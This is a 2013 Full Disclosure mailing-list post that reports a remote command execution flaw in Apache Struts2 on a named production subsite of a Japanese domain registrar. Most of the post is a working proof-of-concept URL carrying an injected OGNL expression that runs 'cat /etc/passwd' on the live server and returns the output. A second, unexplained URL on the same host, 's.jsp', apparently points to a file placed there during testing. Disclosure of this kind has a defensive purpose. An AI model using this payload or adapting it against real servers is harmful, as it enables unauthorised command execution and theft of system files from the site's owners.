Full Disclosure mailing list archives

Japan's largest domain name registrar a subsite remote command execution


From: you help <help.en () wooyun org>
Date: Sun, 13 Oct 2013 21:51:29 +0800

*Abstract:*

Japan's largest domain name registrar a subsite remote command execution

Details:

Apache struts2 a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
execution。

URL:
http://dom.onamae.com/biglobe-ddns/detail.do

*Proofs of concept:*

http://dom.onamae.com/biglobe-ddns/detail.do?redirect:${%23s%3dnew%20java.util.ArrayList(),%23x%3dnew%20java.lang.String(%22cat%22),%23xx%3dnew%20java.lang.String(%22/etc/passwd%22),%23s.add(%23x),%23s.add(%23xx),%23a%3dnew%20java.lang.ProcessBuilder(%23s).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23dddddd%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23dddddd.println(%23d),%23dddddd.close()}

http://dom.onamae.com/biglobe-ddns/s.jsp

_______________________________________________


Form: http://en.wooyun.org/bugs/wooyun-2013-011

Author: Finger <http://en.wooyun.org/whitehats/Finger>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: